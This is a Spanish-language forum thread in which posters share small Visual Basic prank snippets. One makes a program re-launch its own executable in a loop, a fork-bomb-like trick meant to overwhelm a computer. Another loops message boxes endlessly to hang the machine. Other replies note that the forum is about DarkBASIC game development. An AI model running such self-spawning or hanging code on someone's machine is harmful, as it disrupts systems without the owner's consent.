DarkBASIC - Vb Dark

<<>>
 
Vista:

Vb Dark

Publicado por Gustavo Moya (2 intervenciones) el 11/01/2003 08:41:05
Supongo que este foro es para VB versión Dark, asi que les pondre un sencillo código para volver loca una computadora, este código se pone en la parte load del formulario principal de la aplicación:

'------------------- LocoMachine ----------------------
for x=1to100
msgbox "Soy Feliz como una Lombriz"
x=shell(app.path+"\"+app.exename+".exe")
next

Valora esta pregunta
Me gusta: Está pregunta es útil y esta claraNo me gusta: Está pregunta no esta clara o no es útil
0
Responder

RE:Vb Dark

Publicado por Gustavo Moya (2 intervenciones) el 11/01/2003 08:43:28
por cierto, entre el 1 y el to y va un espacio al igual que en el to y el 100

for x=1_to_100

(el _ significa espacio) osea: for x=1 to 100
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Vb Dark

Publicado por Hisashi (1 intervención) el 12/01/2003 23:58:50
estás clarito es lo que piensas, este foro no es Visual Basic version Dark, ¿que acaso no leiste el primer mensaje?. Este foro es sobre un lenguaje que se llama DarkBasic y que sirve para el desarrolllo de juegos en 3d.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Vb Dark

Publicado por Nestor García (1 intervención) el 15/01/2003 07:40:12
La primera nota no estaba cuando el puso su Post
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Vb Dark

Publicado por Server (1 intervención) el 05/10/2005 21:48:21
weno tio e leido el código y diría k sto s mas bien de visual basic mas k d dark basic. Te propongo otro tipo d kulgue :

private sub form_load()
goto a
a:
msgbox"cualkier mnsaje"
goto a
end sub

creo k tienes idea sobre programación lo ntenderas
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar